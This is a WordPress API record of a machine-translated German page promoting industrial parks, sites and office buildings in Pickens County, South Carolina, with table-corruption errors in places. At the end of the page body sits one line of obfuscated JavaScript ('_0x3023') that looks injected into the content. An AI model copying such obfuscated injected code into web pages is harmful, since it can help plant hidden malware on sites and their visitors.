{"id":8606,"date":"2020-10-28T16:08:18","date_gmt":"2020-10-28T16:08:18","guid":{"rendered":"http:\/\/alliancepickens.com\/standorte-gebaeude\/"},"modified":"2020-12-04T20:12:54","modified_gmt":"2020-12-04T20:12:54","slug":"standorte-gebaeude","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/","title":{"rendered":"Standorte &amp; Geb\u00e4ude"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;]\n\t\t\t<!-- START Alliance Pickens Property GFX REVOLUTION SLIDER 6.4.6 --><p class=\"rs-p-wp-fix\"><\/p>\n\t\t\t<rs-module-wrap id=\"rev_slider_3_1_wrapper\" data-source=\"gallery\" style=\"background:#FFFFFF;padding:0;margin:0px auto;margin-top:0;margin-bottom:0;max-width:;\">\n\t\t\t\t<rs-module id=\"rev_slider_3_1\" style=\"\" data-version=\"6.4.6\">\n\t\t\t\t\t<rs-slides>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-11\" data-title=\"Seven Company\" data-duration=\"9700\" data-anim=\"ms:800ms;r:0;\" data-in=\"o:0;e:power1.inOut;\" data-out=\"e:power1.inOut;\" data-p1=\"B2B Services\" data-p3=\"View\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" src=\"\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/bg-placeholder.jpg\" alt=\"Mountain View\" title=\"Mountain View 5\" width=\"1920\" height=\"753\" class=\"rev-slidebg tp-rs-img\" data-no-retina>\n\t\t\t\t\t\t\t<rs-bgvideo \n\t\t\t\t\t\t\t\tdata-video=\"w:100%;h:100%;nse:false;l:true;ptimer:false;vfc:true;\"\n\t\t\t\t\t\t\t\tdata-mp4=\"\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/propertysearch-small.mp4\"\n\t\t\t\t\t\t\t><\/rs-bgvideo>\n<!--\n\t\t\t\t\t\t\t--><a\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-2\" \n\t\t\t\t\t\t\t\tclass=\"rs-layer rev-btn\"\n\t\t\t\t\t\t\t\thref=\"https:\/\/alliancepickens.giswebtechrecruit.com\/?sorting=featured%20desc,%20name%20asc&showpropertyonmap=true&mapextent=-9384113.706503402,4058819.237230376,-9030363.139599778,4227592.195683964\" target=\"_blank\" rel=\"nofollow noopener\"\n\t\t\t\t\t\t\t\tdata-type=\"button\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:542px,745px,609px,338px;yo:182px,250px,204px,113px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:32,44,36,20;l:50,68,55,30;fw:700;\"\n\t\t\t\t\t\t\t\tdata-dim=\"minh:0px,none,none,none;\"\n\t\t\t\t\t\t\t\tdata-padding=\"r:20,28,23,13;l:20,28,23,13;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tdata-frame_hover=\"bgc:#1d2e66;bor:0px,0px,0px,0px;sp:200;e:power1.inOut;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:8;background-color:#65c8ae;font-family:Open Sans;\"\n\t\t\t\t\t\t\t>Search Now \n\t\t\t\t\t\t\t<\/a><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-3\" \n\t\t\t\t\t\t\t\tdata-type=\"text\"\n\t\t\t\t\t\t\t\tdata-color=\"#1d2e66\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:48px,66px,54px,30px;yo:43px,59px,48px,26px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:24,33,27,15;l:25,34,27,15;ls:1px,1px,0px,0px;fw:600;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:12;font-family:Open Sans;text-transform:uppercase;\"\n\t\t\t\t\t\t\t>Property Search \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-4\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:35px,48px,39px,21px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:298px,409px,334px,185px;h:40px,55px,45px,25px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:11;background-color:#ffffff;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-5\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:46px,63px,51px,28px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:305px,419px,342px,190px;h:36px,49px,40px,22px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:10;background-color:#e8e8e8;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-6\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:54px,74px,60px,33px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:281px,386px,315px,175px;h:36px,49px,40px,22px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:9;background-color:rgba(3,121,91,0.8);\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-7\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:184px,253px,207px,115px;yo:68px,93px,76px,42px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:100px,137px,112px,62px;h:2px,2px,1px,1px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:13;background-color:#5dc9ae;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n-->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t<\/rs-slides>\n\t\t\t\t\t<rs-static-layers><!--\n\t\t\t\t\t--><\/rs-static-layers>\n\t\t\t\t<\/rs-module>\n\t\t\t\t<script type=\"text\/javascript\">\n\t\t\t\t\tsetREVStartSize({c: 'rev_slider_3_1',rl:[1240,1024,778,480],el:[250,700,700,800],gw:[800,1100,900,500],gh:[250,508,415,231],type:'standard',justify:'',layout:'fullwidth',mh:\"0\"});\n\t\t\t\t\tvar\trevapi3,\n\t\t\t\t\t\ttpj;\n\t\t\t\t\tfunction revinit_revslider31() {\n\t\t\t\t\tjQuery(function() {\n\t\t\t\t\t\ttpj = jQuery;\n\t\t\t\t\t\trevapi3 = tpj(\"#rev_slider_3_1\");\n\t\t\t\t\t\tif(revapi3==undefined || revapi3.revolution == undefined){\n\t\t\t\t\t\t\trevslider_showDoubleJqueryError(\"rev_slider_3_1\");\n\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\trevapi3.revolution({\n\t\t\t\t\t\t\t\tvisibilityLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tgridwidth:\"800,1100,900,500\",\n\t\t\t\t\t\t\t\tgridheight:\"250,508,415,231\",\n\t\t\t\t\t\t\t\tspinner:\"spinner4\",\n\t\t\t\t\t\t\t\tperspective:600,\n\t\t\t\t\t\t\t\tperspectiveType:\"local\",\n\t\t\t\t\t\t\t\teditorheight:\"250,700,700,800\",\n\t\t\t\t\t\t\t\tresponsiveLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tprogressBar:{disableProgressBar:true},\n\t\t\t\t\t\t\t\tnavigation: {\n\t\t\t\t\t\t\t\t\tonHoverStop:false\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tfallbacks: {\n\t\t\t\t\t\t\t\t\tallowHTML5AutoPlayOnAndroid:true\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t});\n\t\t\t\t\t} \/\/ End of RevInitScript\n\t\t\t\tvar once_revslider31 = false;\n\t\t\t\tif (document.readyState === \"loading\") {document.addEventListener('readystatechange',function() { if((document.readyState === \"interactive\" || document.readyState === \"complete\") && !once_revslider31 ) { once_revslider31 = true; revinit_revslider31();}});} else {once_revslider31 = true; revinit_revslider31();}\n\t\t\t\t<\/script>\n\t\t\t\t<script>\n\t\t\t\t\tvar htmlDivCss = unescape(\"%23rev_slider_3_1_wrapper%20rs-loader.spinner4%20div%20%7B%20background-color%3A%20%23ffffff%20%21important%3B%20%7D\");\n\t\t\t\t\tvar htmlDiv = document.getElementById('rs-plugin-settings-inline-css');\n\t\t\t\t\tif(htmlDiv) {\n\t\t\t\t\t\thtmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss;\n\t\t\t\t\t}else{\n\t\t\t\t\t\tvar htmlDiv = document.createElement('div');\n\t\t\t\t\t\thtmlDiv.innerHTML = '<style>' + htmlDivCss + '<\/style>';\n\t\t\t\t\t\tdocument.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]);\n\t\t\t\t\t}\n\t\t\t\t<\/script>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<!-- END REVOLUTION SLIDER -->\n[\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Industrieparks<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen speziellen Glasfaserschalter, eine gro\u00dfe Abwasserkapazit\u00e4t, eine Wasserkapazit\u00e4t und einen Wasserspeicher mit einer Gallone umfasst, der f\u00fcr die Nutzung durch Commerce Park-Einrichtungen vorgesehen ist.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">Unternehmen im Pickens County Commerce Park:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-kontakt USA<\/li>\n<li>IPSUM-Technologien<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>JR Automation Technologies<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>Zuverl\u00e4ssige automatische Sprinkler-Firma<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast USA<\/li>\n<li>Taylormade<\/li>\n<li>United Tool und Form<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Pickens County Commerce Park Features umfassen:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Industriepark Klasse A<\/li>\n<li>Schutzb\u00fcndnisse in Kraft | <a href=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Lesen Sie mehr<\/a><\/li>\n<li>Zwei Umspannwerke und zwei Stromversorger<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Digitaler Faserschalter vor Ort<\/li>\n<li>Robuste Infrastruktur vorhanden<\/li>\n<li>\u00dcber 1,1 Millionen Quadratmeter Baufl\u00e4che<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Campus-\u00e4hnliche Umgebung<\/li>\n<li>Zwischen Charlotte, NC und Atlanta, GA<\/li>\n<li>Eine verbleibende Website<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/\">Erfahren Sie mehr \u00fcber den Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4765&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;industrial_sites&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Industriestandorte<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]Alliance Pickens bietet Unterst\u00fctzung bei der Standortauswahl f\u00fcr Unternehmen, die Pickens County.South Carolina.USA in Betracht ziehen. f\u00fcr ihr Expansions- oder Umzugsprojekt. Das Team von Alliance Pickens bietet eine Reihe von Schl\u00fcsseldiensten, darunter die Identifizierung potenzieller Standorte, die Koordination von Touren, die Erstellung vertraulicher Anfragen, die Personalisierung von Strategien zur Entwicklung von Arbeitskr\u00e4ften und die Zusammenarbeit mit Regierungsbeh\u00f6rden und der lokalen Gesch\u00e4ftswelt.<\/p>\n<p>Alliance Pickens arbeitet routinem\u00e4\u00dfig mit F\u00fchrungskr\u00e4ften, Standortauswahlberatern und anderen am Standortauswahlprozess beteiligten Parteien zusammen, um eine zusammenarbeitende Anstrengung sicherzustellen, die sowohl die unmittelbaren als auch die langfristigen Anforderungen Ihrer Organisation ber\u00fccksichtigt.<\/p>\n<p>Unternehmensanforderungen wie Geb\u00e4ude vor Ort, Infrastruktur, Zugriff auf Glasfaser und andere gesch\u00e4ftliche Priorit\u00e4ten werden verwendet, um den Standort zu finden, der Ihrem Projekt zum Erfolg verhilft.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<span style=\"font-size: 12px\">Bitte sehen Sie sich die unten aufgef\u00fchrten verf\u00fcgbaren Websites an und kontaktieren Sie <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact\">uns<\/a> f\u00fcr weitere Unterst\u00fctzung.<\/span>[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c8\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4915&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;industrial_buildings&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Industriegeb\u00e4ude<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<span style=\"font-weight: 400\">Die Mitarbeiter von Alliance Pickens stellen Ihnen gerne die Auswahl an Industriegeb\u00e4uden zur Verf\u00fcgung, um einen Standort zu finden, der Ihren gesch\u00e4ftlichen Anforderungen entspricht. Bitte kontaktieren Sie uns f\u00fcr Informationen \u00fcber die damit verbundenen Bed\u00fcrfnisse Ihres Unternehmens, von der Zulassung von Bedenken bis hin zur Verf\u00fcgbarkeit von Arbeitskr\u00e4ften, um den Auswahlprozess zu erleichtern.<\/span><\/p>\n<p><span style=\"font-weight: 400\">F\u00fcr weitere Informationen zu diesen oder anderen Unterk\u00fcnften <\/span>kontaktieren Sie <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact\"><span style=\"font-weight: 400\">uns<\/span><\/p>\n<p><\/a> bitte f\u00fcr<span style=\"font-weight: 400\"> weitere Unterst\u00fctzung.<\/span>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<div>Attention: The internal data of table \u201c9\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10703&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;office_buildings&#8221;][vc_column][vc_column_text]<\/p>\n<h2>B\u00fcrogeb\u00e4ude<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]Alliance Pickens kann helfen, Unternehmen zu erweitern oder zu verlagern, um geeignete gesch\u00e4ftsm\u00e4\u00dfige B\u00fcrogeb\u00e4ude zum Verkauf oder zur Vermietung in Pickens County.South Carolina.USA zu identifizieren.<\/p>\n<p>Um mehr \u00fcber Fl\u00e4chenchancen zu erfahren, lesen Sie unsere Liste der ausgew\u00e4hlten Objekte. F\u00fcr weitere Informationen \u00fcber diese und andere verf\u00fcgbare gewerbliche B\u00fcrogeb\u00e4ude zum Verkauf oder zur Vermietung in der Pickens County.South Carolina.USA Bereich, kontaktieren Sie bitte <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact\">Alliance Pickens<\/a>.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<div>Attention: The internal data of table \u201c10\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Erfahren Sie mehr \u00fcber Sites &amp; Buildings<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Industrieparks [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8606","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Standorte &amp; Geb\u00e4ude - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Standorte &amp; Geb\u00e4ude - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Industrieparks [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:12:54+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/\",\"name\":\"Standorte &amp; Geb\u00e4ude - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-10-28T16:08:18+00:00\",\"dateModified\":\"2020-12-04T20:12:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Standorte &amp; Geb\u00e4ude\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Standorte &amp; Geb\u00e4ude - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/","og_locale":"de_DE","og_type":"article","og_title":"Standorte &amp; Geb\u00e4ude - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Industrieparks [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:12:54+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/","url":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/","name":"Standorte &amp; Geb\u00e4ude - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-10-28T16:08:18+00:00","dateModified":"2020-12-04T20:12:54+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Standorte &amp; Geb\u00e4ude"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens 